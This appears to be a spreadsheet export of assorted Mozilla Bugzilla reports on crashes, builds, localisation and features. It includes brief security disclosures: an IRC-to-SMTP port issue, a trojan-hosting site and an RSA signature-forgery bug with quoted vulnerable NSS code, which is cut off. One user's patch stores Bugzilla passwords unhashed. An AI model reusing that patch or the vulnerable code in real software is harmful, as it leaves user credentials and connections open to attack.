    <t>Add GeoTrust's ECC root</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1)
Build Identifier: 
Please accept the attached GeoTrust root certificate for inclusion in Firefox. 
This CA will be used to sign certificates for SSL-enabled servers and may
in the future be used to sign certificates for digitally-signed executable code
objects.
Name of the CA certificate is GeoTrust Primary Certificate
Authority - G2
Link to GeoTrust's CPS - http://www.geotrust.com/resources/repository/legal.asp
Attestation of our conformance to the stated verification requirements can be
found here: https://cert.webtrust.org/ViewSeal?id=650
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>jschiavo</t>
  </si>
  <si>
    <t>CORE-382015</t>
  </si>
  <si>
    <t>Handle old/new API behavior of cairo_{fillstroke}_extent on branch</t>
  </si>
  <si>
    <t>Created attachment 266077
don't depend on API bug
Since linux distributors can't seem to understand --enable-system-cairo is unsupported we need to change the branch SVG code to handle both the old and new API behavior of cairo_{fillstroke}_extent.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-212094</t>
  </si>
  <si>
    <t>application for stage access to post linux/powerpc builds</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4) Gecko/20030624
hi i would like to have access to the ftp server in order to post linux/powerpc
builds of the browser. this would involve writing to /pub/mozilla/releases.
timeless suggested that i apply for this account.
thanks :)
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-190532</t>
  </si>
  <si>
    <t>IRC may need port restriction to avoid SMTP exploit</t>
  </si>
  <si>
    <t>From Georgi:
   We may want to restrict the ports that IRC can use since it might be
possible to use a link like
IRC TO localhost:smtp
to send mail in another user's name similar to a problem we once had with Gopher.</t>
  </si>
  <si>
    <t>CORE-385569</t>
  </si>
  <si>
    <t>Dynamic cross-element ligature leaves space between parts of the ligature</t>
  </si>
  <si>
    <t>Created attachment 269494
testcase
Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.9a6pre) Gecko/20070622 Minefield/3.0a6pre
In the testcase you get the fi ligature form but there are a few blank pixels between the f part and the i part.</t>
  </si>
  <si>
    <t>CORE-400485</t>
  </si>
  <si>
    <t>[FIX]Incompatibility: applet code parameter is fully-qualified in FF 3 (applet.code is absolute uri)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a9pre) Gecko/2007101605 Minefield/3.0a9pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a9pre) Gecko/2007101605 Minefield/3.0a9pre
It appears that the code parameter to the applet tag is made a fully-qualified URL in some situations by Firefox 3. Previously it was passed along unmodified to the Java Plug-In and it was the plug-in's responsibility to turn it into a fully-qualified URL based on the codebase parameter. This is an incompatibility illustrated by the attached test case. This test case runs successfully on IE 6 IE 7 FF 1.5 FF 2.0 and Mozilla 1.8 so there is a strong indication that this change should be undone in FF 3.
Reproducible: Always
Steps to Reproduce:
1. Install FF 3 and Java.
2. Use Java Control Panel to open Java Console.
3. Navigate to included HTML file and watch output on Java Console.
Actual Results:  
NullPointerException is thrown in the Java Console.
Expected Results:  
Printed output ending in successful run of test is produced.</t>
  </si>
  <si>
    <t>kbrussel</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-513023</t>
  </si>
  <si>
    <t>Move about:rights content to toolkit</t>
  </si>
  <si>
    <t>...so that it can easily be used in Fennec or any other MPL-distributed app that wants to use it (thunderbird? seamonkey?)</t>
  </si>
  <si>
    <t>CORE-71106</t>
  </si>
  <si>
    <t>[XUL Syntax] Change DOM create and destroy popup events and add new shown/hidden popup events</t>
  </si>
  <si>
    <t>The events for menu opening and closing are too generically named.  They should
be renamed to popupShowing and popupHiding.
While I'm in here the nsIDOMMenuLIstener file should be renamed to
nsIDOMXULListener and the associated event names should be cleaned up
as well.</t>
  </si>
  <si>
    <t>BUGZILLA-207039</t>
  </si>
  <si>
    <t>add description how to install bugzilla under regular user privileges</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4b) Gecko/20030519
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4b) Gecko/20030519
mysql can be run as user.
cgi-bin as well.
Therefore it would be great to be able have a bugzilla instance set up without
requiring root privileges on the server.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
1) in http://www.bugzilla.org/docs216/html/stepbystep.html#AEN605 it would be
great to provide a full example of the stanza (or is the sample in
http://www.bugzilla.org/docs216/html/extraconfig.html#htaccess sufficient?)
2) I guess I would have to run the perl script in
http://www.bugzilla.org/docs216/html/stepbystep.html#AEN624
Any further precautions I have to take?
3) On a side note is there any precautions one would have to take to run it
under https or is that transparent?</t>
  </si>
  <si>
    <t>hauser</t>
  </si>
  <si>
    <t>BUGZILLA-574940</t>
  </si>
  <si>
    <t>percentage_complete searches fail on PostgreSQL</t>
  </si>
  <si>
    <t>Trying to search on percentage_complete on PostgreSQL throws a Division By Zero error from the database.</t>
  </si>
  <si>
    <t>CALENDAR-356183</t>
  </si>
  <si>
    <t>Provider: CalDAV</t>
  </si>
  <si>
    <t>CalDAV provider throws on retrieval of VTODOs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.4) Gecko/20060614 Fedora/1.5.0.4-1.2.fc5 Firefox/1.5.0.4 pango-text
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061006 Sunbird/0.3
The Darwin CalendarServer is the first of the CalDAV servers commonly used with Sunbird that supports VTODOs. Sunbird can place VTODO items in a CalendarServer repostitory but throws when trying to retrieve them.
Reproducible: Always
Steps to Reproduce:
1. Using Sunbird create a VTODO item on a CalendarServer repository
2. Exit/restart Sunbird
3.
Actual Results:  
Item does not appear in Tasks list
In Error Console: Error: [Exception... Component returned failure code: 0x80004002 (NS_NOINTERFACE) [nsISupports.QueryInterface]  nsresult: 0x80004002 (NS_NOINTERFACE)  location: JS frame :: file:///home/bruno/dloads/sunbird/components/calDavCalendar.js :: anonymous :: line 720  data: no]
Source File: file:///home/bruno/dloads/sunbird/components/calDavCalendar.js
Line: 720
Expected Results:  
Item should appear in Task list
No errors in Error Console
patch forthcoming. FWIW I don't think this should have any impact whatsoever on release of 0.3: I just want to get it in the queue.</t>
  </si>
  <si>
    <t>browning</t>
  </si>
  <si>
    <t>CORE-154191</t>
  </si>
  <si>
    <t>[FIX]Zombie windows prevent normal close of last window</t>
  </si>
  <si>
    <t>Using the 6/21 NS verification build I just got into a state where closing the
last window would not trigger the normal app close behavior in this case a
QuickLaunch 'exit'/restart.  After closing the last window there was no
indication of any open window not even in the Windows taskbar yet the QL icon
remained there was no disk activity associated with QL relaunch and on
subsequent launch of mail I was able to use my account without authenticating. I
did notice that there were two blank entries in the Window menu list but
selecting them did not change the active window nor was there any sign of them
on the screen.  I was able to get a normal exit using File-&gt;Exit.
I don't know how to reproduce these invisible windows but it seems that they
should not prevent normal close behavior since users have no knowledge of them
nor any way to close them and expect that their mail account is not left open
for anyone to use after the last visible window is closed.</t>
  </si>
  <si>
    <t>BUGZILLA-219358</t>
  </si>
  <si>
    <t>attachments with MIME type application/xhtml+xml cannot be viewed in the edit page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5b) Gecko/20030914 Firebird/0.6.1+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5b) Gecko/20030914 Firebird/0.6.1+
Attachments with MIME type application/xhtml+xml are not displayed in the edit
page.
Reproducible: Always
Steps to Reproduce:
1. Click on Edit next to an attachment which has the MIME type
application/xhtml+xml
Actual Results:  
On the right side of the edit page an error is displayed: Attachment cannot be
viewed because its MIME type is not either text/* image/* or
application/vnd.mozilla.*. Download the attachment instead.
Expected Results:  
Bugzilla should display the attachment.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-378653</t>
  </si>
  <si>
    <t>eu / Basque</t>
  </si>
  <si>
    <t>Copyright year in eu Sunbird 0.5pre build is wrong</t>
  </si>
  <si>
    <t xml:space="preserve">Copyright year in eu Sunbird 0.5pre build is wrong should be 2007
</t>
  </si>
  <si>
    <t>ibon.igartua</t>
  </si>
  <si>
    <t>NSS-95983</t>
  </si>
  <si>
    <t>jarver.c: uninitialized variables might be being used before being set</t>
  </si>
  <si>
    <t>jarver.c: In function `jar_validate_pkcs7':
jarver.c:1661: warning: `cinfo' might be used uninitialized in this function
Here if SEC_PKCS7DecoderStart returns NULL uninitialized cinfo will be
compared with NULL and if it happens to be non-NULL that random pointer will be
accessed.
jarver.c: In function `jar_get_certificate':
jarver.c:1873: warning: `fing' might be used uninitialized in this function
Here the code seems to be OK but it still would be nice to get rid of compiler
warning.</t>
  </si>
  <si>
    <t>mozilla-bugs</t>
  </si>
  <si>
    <t>BUGZILLA-352608</t>
  </si>
  <si>
    <t>Make checksetup more localizable</t>
  </si>
  <si>
    <t>I've already done some work toward making checksetup.pl localizeable by creating Bugzilla::Install::get_text.
Now I just need to use that in other places and make the error messages and status messages localizable.
Some messages can't be localized because they're printed out before templates can even be used. But otherwise most messages can be localized.</t>
  </si>
  <si>
    <t>CORE-456078</t>
  </si>
  <si>
    <t>TM: Document LIR.h a bit</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-449448</t>
  </si>
  <si>
    <t>Expose information about templated functions to dehydra</t>
  </si>
  <si>
    <t>Created attachment 332575
patch with testcase rev. 1
Right now templated function declarations can show up in dehydra within a class type. In the future I'd also like to expose templated function and maybe class declarations in process_decl. This code makes it possible to intelligently work with these declarations. typenames type objects will have .isTypename=true and templated functions will have a .template=[name: A type:{}] array on them</t>
  </si>
  <si>
    <t>BUGZILLA-300390</t>
  </si>
  <si>
    <t>cannot add new users on 2.20rc1 from editusers.cgi</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.6) Gecko/20050524 Firefox/1.0 (Ubuntu package 1.0.2 MFSA2005-44)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.6) Gecko/20050524 Firefox/1.0 (Ubuntu package 1.0.2 MFSA2005-44)
When a new user login (not in the database yet) i get this message:
Undefined subroutine &amp;Bugzilla::User::bz_crypt called at Bugzilla/User.pm line
1141  line 283.
This does not happend if the user is already in the database (has already logon
once before).
I change this line in User.pm
sub insert_new_user ($$$$) {
    my ($username $realname $password $disabledtext) = (@_)
    my $dbh = Bugzilla-&gt;dbh
    $disabledtext ||= ''
    # If not specified generate a new random password for the user.
    $password ||= 
    #my $cryptpassword = bz_crypt($password)  &lt;===== OLD
    my $cryptpassword = password            &lt;===== NEW
And everything works ok.
Be really carefull because i dont know if this is ok ...
Ignacio
Reproducible: Always
Steps to Reproduce:
1. Configure LDAP Auth
2. Login with a new user (never logon before)
Actual Results:  
Get the error message</t>
  </si>
  <si>
    <t>igalmarino</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-415510</t>
  </si>
  <si>
    <t>Dragging multiple items to the app/Dock icon fails to open any of them after certain AppleEvents</t>
  </si>
  <si>
    <t>On the trunk if you drag multiple weblocs to the Dock or app icon at the same time Camino fails to open any of the weblocs.  Works fine on branch.
I have no idea when this might have regressed :-(</t>
  </si>
  <si>
    <t>SEAMONKEY-241058</t>
  </si>
  <si>
    <t>DEBUG-only crash when visiting hixie's blog (http://ln.hixie.ch/) [@ nsINodeInfo::Equals]</t>
  </si>
  <si>
    <t>crash when visiting hixie's blog (http://ln.hixie.ch/)
this is with the trunk I have a stack.
look like we might be de-references a null nsCOMPtr.</t>
  </si>
  <si>
    <t>CORE-175564</t>
  </si>
  <si>
    <t>[FIX]Fix up array stuff in Editor (nsCOMArray)</t>
  </si>
  <si>
    <t>Patch coming up.  Replaces most instances of nsISupportsArray with
nsCOMArray and nsCOMArray gets rid of a lot of the
icky address_of() stuff (there's still some left though) fixes the requisite
leak or two.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-155486</t>
  </si>
  <si>
    <t>Should be able to Undo bookmark changes</t>
  </si>
  <si>
    <t>Bookmark changes (moving around deletion) should be Undoable/Redoable.</t>
  </si>
  <si>
    <t>NSS-431805</t>
  </si>
  <si>
    <t>leak in NSSArena_Destroy()</t>
  </si>
  <si>
    <t>Using mdb+libumem.so provided in solaris 10 I found a leak in NSSArena_Destroy()
Re-produce steps:
Same with the steps in bug 431628
libumem.so reports a leak in NSSArena_Destroy() and following is the call stack
                 libumem.so.1`umem_cache_alloc_debug+0x14f
                 libumem.so.1`umem_cache_alloc+0x144
                 libumem.so.1`umem_alloc+0xc5
                 libumem.so.1`malloc+0x27
                 libumem.so.1`calloc+0x47
                 libnspr4.so`PR_Calloc+0x65
                 libnss3.so`error_get_my_stack+0xfc
                 libnss3.so`nss_ClearErrorStack+0x26
                 libnss3.so`NSSArena_Create+0x26
                 libnss3.so`NSSTrustDomain_Create+0x26
                 libnss3.so`STAN_LoadDefaultNSS3TrustDomain+0x79
                 libnss3.so`nss_Init+0x44d
                 libnss3.so`NSS_NoDB_Init+0x95
                 libpipnss.so`unsigned nsNSSComponent::InitializeNSS+0x1c9
                 libpipnss.so`unsigned nsNSSComponent::Init+0x331
                 libpipnss.so`unsigned nsNSSComponentConstructor+0xbf
                 libxpcom_core.so`unsigned nsGenericFactory::CreateInstance+0x46
                 libxpcom_core.so`unsigned nsComponentManagerImpl::CreateInstanc
                 eByContractID+0xda   
                 ...
The root cause is in follow codes NSSArena_Destroy()
(
  NSSArena *arena
)
{
  nss_ClearErrorStack()
  ...
}
nss_ClearErrorStack() doesn't free the thread private data which is set in error_get_my_stack(). Though in error_once_function() this data is 
set to be freed when thread terminates it doesn't work for main thread
So the data (stack) which is created in main thread is leaked</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-424681</t>
  </si>
  <si>
    <t>Sisyphus - update profile user prefs</t>
  </si>
  <si>
    <t>Created attachment 311281
patch
This patch updates the preferences to run off script run time checks in the content and chrome make the browser check the cache each time and turns off extension compatibility checking and update security checking.</t>
  </si>
  <si>
    <t>CORE-467162</t>
  </si>
  <si>
    <t>uninitialized local variable warning in xpcwrappedjsclass.cpp</t>
  </si>
  <si>
    <t>c:\mozbuild\mozilla\js\src\xpconnect\src\xpcwrappedjsclass.cpp(302) : warning C4700: uninitialized local variable 'jsexception' used
Caused by the patch for bug 459790</t>
  </si>
  <si>
    <t>WEBSITES-452399</t>
  </si>
  <si>
    <t>Translate Mozilla Surveys web application User Interface in Greek</t>
  </si>
  <si>
    <t>George the file to translate is:
https://bugzilla.mozilla.org/attachment.cgi?id=333389
I am separating your translation from the main bug because you have a longer deadline given that we have no survey in Greek for September.
Thanks</t>
  </si>
  <si>
    <t>CORE-76497</t>
  </si>
  <si>
    <t>setting CSS property visibility: collapse on COL element doesn't collapse the column (  table style visibility collapsed)</t>
  </si>
  <si>
    <t xml:space="preserve">Accoding to the CSS 2 docs you should be able to collapse a table column by 
setting 
  visibility: collapse
on the COL element. I don't get that effect however with Mozilla.
col test
&lt;input type=button value=toggle column visibility
       onclick=with (document.getElementById('aCol').style)
                 if (visibility == '')
                   visibility = 'collapse'
                 else
                   visibility = ''
/&gt;
&lt;col id=aCol
     style=background-color: blue 
     onmouseover=alert(event.type + ' for ' + event.target)
&gt;
Name
Home
Kibo
http://www.kibo.com
</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-343296</t>
  </si>
  <si>
    <t>Spell-checker requires text cursor to be in word to get context menu</t>
  </si>
  <si>
    <t>I can't seem to trigger the spell-checker context menu unless the text insertion point is inside the word in question or the word is selectd. A Control-click (or right-click) simply gives the normal textarea context menu.
Worse if the insertion point is in a misspelled word and I right-click on a *different* misspelled word I get the context menu for the original misspelled word.
STR:
1) Find any page with a textarea.
2) Type in mispeled werd . (The trailing space is important.)
3) Control- or right-click on either underlined word and note lack of spellchecker context menu.
4) Put text insertion point inside or immediately adjacent to mispeled.
5) Control- or right-click on werd.
6) Wonder why misspelled is an option for spelling werd properly.</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-310140</t>
  </si>
  <si>
    <t>Minimo Front-End</t>
  </si>
  <si>
    <t>Implement No Style Option to Remove CSS Specified by the Site</t>
  </si>
  <si>
    <t>An easy way to disable any styles specified by the page similar to the
'View-&gt;Page Style-&gt;No Style' option in Firefox would be very useful on pages
that specify a fixed width in their CSS.</t>
  </si>
  <si>
    <t>CORE-53312</t>
  </si>
  <si>
    <t>jar: implement memory flusher for zip cache</t>
  </si>
  <si>
    <t>Per (my recollection of) jband's investigation this was accounting for
something like 200K per JAR file or something? Need to hook up as a memory
pressure observer.</t>
  </si>
  <si>
    <t>dprice</t>
  </si>
  <si>
    <t>NSS-319499</t>
  </si>
  <si>
    <t>Add NBIO support to RevChecker API</t>
  </si>
  <si>
    <t>We found out that non-blocking I/O support was added only to the cert store (for LDAP) and cert chain checker (for CRLs). The revocation checker API doesn't have this support. This would be useful for OCSP although OCSP can also be implemented as a cert chain checker.</t>
  </si>
  <si>
    <t>richard.freedman</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-475747</t>
  </si>
  <si>
    <t>need 3 new minis imaged with our 10.5 image</t>
  </si>
  <si>
    <t>I'm pretty sure we already have a mac mini 10.5 image taken can we get a new mini setup with it please?</t>
  </si>
  <si>
    <t>TOOLKIT-388507</t>
  </si>
  <si>
    <t>Javascripting crashes FireFox - WARNING!! Spammers site with embedded Trojan! (Nuwar.Gen worm)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
When loading this site it with JS enabled it repeatedly caused FF to crash out w/o warning.. only with JS disabled would it load... and then I nabbed the source and confirmed there was an attempt to infect the visitor with the trojan in question.  The fact it crashes FF completely is definately a bug in JS coding.. and on a quick glance of the source it looks similar to a buffer overflow attempt.
Reproducible: Always
Steps to Reproduce:
1. load site in question
Actual Results:  
FF crashes out w/o any warning.. as if it was shutdown.
Expected Results:  
Not allowed a crash to be induced via JS coding.
I have uploaded a copy of the site's source code here in case the site goes down and so anyone working on fixing this can easily have access to it w/o having to load the site in question:
http://sharebee.com/5ed692e4
I have also marked this as confidential so no one can access this before a fix can be found.. (better safe than sorry I say.)
Theme in use here is Classic Compact 2.0.2 and this bug happens with the default theme as well.  I can provide a complete listing of installed plugins as well if needed.  If more info is needed at all pls let me know.</t>
  </si>
  <si>
    <t>kindanyume</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-280836</t>
  </si>
  <si>
    <t>Minimo needs of a Tab feature (new tab close tab)</t>
  </si>
  <si>
    <t>Mozilla provides the tab feature that enables to share one browser window for
various url's. It's important for minimo to not open up new browser windows
cause embedded devices applications need to be useful and simple (memory and
display limited).</t>
  </si>
  <si>
    <t>ext-andre.pedralho</t>
  </si>
  <si>
    <t>CORE-110335</t>
  </si>
  <si>
    <t>ReplaceSubstring can go on forever</t>
  </si>
  <si>
    <t>For example:
nsString str(
nsString s1(
nsString s2(QB
str.ReplaceSubstring(s1 s2)
This will go on until it runs out of memory.</t>
  </si>
  <si>
    <t>FIREFOX-322610</t>
  </si>
  <si>
    <t>Page Info needs a hook in grabAll() for extensions/overlays to use</t>
  </si>
  <si>
    <t>Otherwise they all have to reimplement the whole process of running through all the nodes in the page for themselves.
I've been meaning to post this patch for quite a while.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-673426</t>
  </si>
  <si>
    <t>reboot requests (scl1)</t>
  </si>
  <si>
    <t>talos-r3-fed-037
talos-r3-fed-057
talos-r3-leopard-018</t>
  </si>
  <si>
    <t>server-ops-releng</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-375049</t>
  </si>
  <si>
    <t>Setup Mozilla europe site and cms</t>
  </si>
  <si>
    <t>I've patched the mozilla-europe site and CMS so they'll run on our systems.  Right now they're setup on dm-cms01 and they're ready to be pushed to a production area.  
I've written instructions for doing this here:
http://people.mozilla.org/~clouserw/docs/moz-eu/setup-moz-eu.html
They're kind of complicated/frustrating so I'd be happy to help if I can.
Thanks.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-586170</t>
  </si>
  <si>
    <t>please cancel try job</t>
  </si>
  <si>
    <t>Please cancel all try jobs for http://hg.mozilla.org/try/rev/254d3952ecfd
(It already showed failures that mean I'll have to do another try push so I don't need the rest in the queue.)</t>
  </si>
  <si>
    <t>CORE-457803</t>
  </si>
  <si>
    <t>nsDragService.cpp(146) : warning C4146: unary minus operator applied to unsigned type</t>
  </si>
  <si>
    <t>{
.../widget/src/windows/nsDragService.cpp(146) : warning C4146: unary minus operator applied to unsigned type result still unsigned
}
Code is:
{
121  PRUint32 bmWidth = dragRect.width bmHeight = dragRect.height
...
142  BITMAPV5HEADER bmih
...
146  bmih.bV5Height      = -bmHeight // flip vertical
}</t>
  </si>
  <si>
    <t>CORE-285066</t>
  </si>
  <si>
    <t>printing crashes if linked stylesheet media attribute not specified [@ nsBlockFrame::SplitPlaceholder ]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
If a number of stylesheets are specified as linked files in the header of an
HTML file and one does not have a 'media' attribute specified then the browser
will crash when attempting to print the page.
eg:
... will crash but this:
... will not crash.
I had a look through the HTML 4.01 spec and it does not seem that the 'media'
attribute is mandatory. Therefore the browser should be able to cope with this
situation.
Reproducible: Always
Steps to Reproduce:
(see details above)
Actual Results:  
Browser crashed with and Application Error
Expected Results:  
Printed the page with the 'print' stylesheet.</t>
  </si>
  <si>
    <t>daniel.willis</t>
  </si>
  <si>
    <t>NSS-230951</t>
  </si>
  <si>
    <t>incorrect template renders some valid cert extensions invalid</t>
  </si>
  <si>
    <t>According to RFC 3280 page 32 the policyQualifiers sequence in a
PolicyInformation is OPTIONAL but in NSS's template for this
CERT_PolicyInfoTemplate[] in nss/lib/certdb/polcyxtn.c
this component is not optional.  Consequently policy extensions that
are properly constructed without this sequence are reported as having
invalid policy extensions.  
Patch is forthcoming.</t>
  </si>
  <si>
    <t>CORE-505771</t>
  </si>
  <si>
    <t>double free [@ JS_free - snarf] in jsshell</t>
  </si>
  <si>
    <t>there's an extra free in an error case :(</t>
  </si>
  <si>
    <t>NSS-228618</t>
  </si>
  <si>
    <t>nssPKIObject_RemoveInstanceForToken uses realloc incorrectly.</t>
  </si>
  <si>
    <t>nssPKIObject_RemoveInstanceForToken uses realloc incorrectly.
        object-&gt;instances = nss_ZREALLOCARRAY(object-&gt;instances
                                              nssCryptokiObject *
                                              object-&gt;numInstances)
        if (!object-&gt;instances) {
            PZ_Unlock(object-&gt;lock)
            return PR_FAILURE
        }
There are two problems.
1. It would lose the pointer to the previously allocated memory
block if realloc returns NULL.
2. We are using realloc to shrink the array here.  Failure to
shrink the array should be ignored.</t>
  </si>
  <si>
    <t>CORE-411256</t>
  </si>
  <si>
    <t>AIX linker error for trunk build xpcom module :ERROR: Undefined symbol: .PR_dtoa</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
While building the trunk on AIX getting below linker error for mozilla/obj-opt/xpcom/tools/registry
ld: 0711-317 ERROR: Undefined symbol: .PR_dtoa
ld: 0711-317 ERROR: Undefined symbol: .PR_snprintf
ld: 0711-317 ERROR: Undefined symbol: .PR_Assert
ld: 0711-317 ERROR: Undefined symbol: .PR_Free
Reproducible: Always
Steps to Reproduce:
1.Build Mozilla Firefox Trunk build on AIX with Gnome 2.12 RPMS of 64 bit
version.
2.
3.
Actual Results:  
Build fails with the above error.
Expected Results:  
No build failure</t>
  </si>
  <si>
    <t>shailen.n.jain</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-907288</t>
  </si>
  <si>
    <t>Gaia::SMS</t>
  </si>
  <si>
    <t>[Messages] Recipients.prototype.remove should guard against calls to splice(-1 1)</t>
  </si>
  <si>
    <t>Spotted by Julien during the review for bug 906753</t>
  </si>
  <si>
    <t>waldron.rick</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-490630</t>
  </si>
  <si>
    <t>Wrong translation for word: installation</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US) AppleWebKit/525.19 (KHTML like Gecko) Chrome/1.0.154.59 Safari/525.19
Build Identifier: firefox 3.5 beta 4
wrong: Ð¸Ð½ÑÑ‚Ð»Ð°Ñ†Ð¸Ñ˜Ñƒ 
correct: Ð¸Ð½ÑÑ‚Ð°Ð»Ð°Ñ†Ð¸Ñ˜Ñƒ
Reproducible: Always
Steps to Reproduce:
1. Execute Firefox Setup 3.5 Beta 4
2. Check words on first windows.
3.</t>
  </si>
  <si>
    <t>mile.davidovic</t>
  </si>
  <si>
    <t>FIREFOX-205107</t>
  </si>
  <si>
    <t>Caret should be focused in Find area in History</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030504 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030504 Mozilla Firebird/0.6
Now that there's a Find function for History I don't have to dig through those
folders but can just find it by typing
The caret is not focused in the Find area for me to open History and just Find
Reproducible: Always
Steps to Reproduce:
1. Open History
2.
3.
Actual Results:  
Caret is not focused so I have to use my mouse
Expected Results:  
Focus the caret in the Find area</t>
  </si>
  <si>
    <t>FIREFOX-337625</t>
  </si>
  <si>
    <t>If an OpenSearch search plugin includes an Url tag with type other than text/html then it doesn't install</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060511 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060511 Minefield/3.0a1
If an OpenSearch (as an OpenSearch description document) plugin includes an Url tag which isn't type=text/html then it won't install in the search bar. This happens even when there is an Url tag with type=text/html. 
Reproducible: Always
Steps to Reproduce:
1. Goto http://www.edazzle.net/os/
2. Click on the drop down list of search plugins
3. Click on one of tthe Add Amazon entries
Actual Results:  
Download error
Expected Results:  
The search plugin to be added to the search bar drop down list of installed plugins
Installs plugins fine when Url tag attribute type is set to text/html and is the only Url tag in the file.</t>
  </si>
  <si>
    <t>dazzle</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-403986</t>
  </si>
  <si>
    <t>please publish these changes
Envoi          it/products/thunderbird/2.0.0.9/releasenotes/index.html
Envoi          pt-PT/products/thunderbird/2.0.0.9/releasenotes/index.html
Envoi          ru/products/thunderbird/2.0.0.9/releasenotes/index.html
Transmission des donnÃ©es ...
RÃ©vision 8057 propagÃ©e.
Thanks</t>
  </si>
  <si>
    <t>THUNDERBIRD-297006</t>
  </si>
  <si>
    <t>No criteria rows displayed on Search Messages dialog box if sized too small or splitter moved too high</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
On the Search Messages dialog there are no criteria rows displayed and there
is no way to get them to display.  Therefore I can't do any searchess.  I've
tried unilstalling Thunderbird and re-installing it but it doesn't fix the
problem. My guess is that somehow my user-specific configuration files have
become corrupted.
When I originally installed the software the Search Messages worked. So I must
have done something that broke it. But I don't know what.
Reproducible: Always
Steps to Reproduce:
I don't know. If you e-mail me I supposed I could send you any configuration
files you think might be significant.</t>
  </si>
  <si>
    <t>mike.public</t>
  </si>
  <si>
    <t>NSS-356215</t>
  </si>
  <si>
    <t>FF1507 RSA signature forgery: unchecked padding length (CVE-2006-5462)</t>
  </si>
  <si>
    <t>security@mozilla.org received the following from Ulrich Kuehn:
Dear Security Group
I've found an implementation bug in handling a certain RSA signature
padding format that allows a man-in-the-middle attack on SSL and TLS
connections under certain circumstances. I'll go into details below.
The bug seems to be present in versions 1.5.0.7 and earlier of firefox
and potentially of other mozilla software that uses the nss subsystem.
I noticed that the problem is resolved in the firefox 2.0 since beta 1
(on the ftp server marked as of Aug 29 2006).
However I ask you to backport a patch to the current version 1.5.0.7 as
I believe that users should not be forced to do a major version upgrade
due to a security bug that could easily be fixed. And the fix is really
easy see attached diff. Maybe the maintainer updating the code did not
notice that this seemingly small bug has some severe consequences?
Now for the technical details. This bug is somewhat related on a
mathematical level to the recent bug that Daniel Bleichenbacher found
for PKCS#1 signature verification. Nevertheless it does not involve any
ASN.1 parsing.
The problem is in security/nss/lib/softoken/rsawrapr.c function
RSA_CheckSign():
    /*
     * check the padding that was used
     */
    if (buffer[0] != 0 || buffer[1] != 1)
        goto loser
    for (i = 2 i &lt; modulus_len - hash_len - 1 i++) {
        if (buffer[i] == 0)
            break
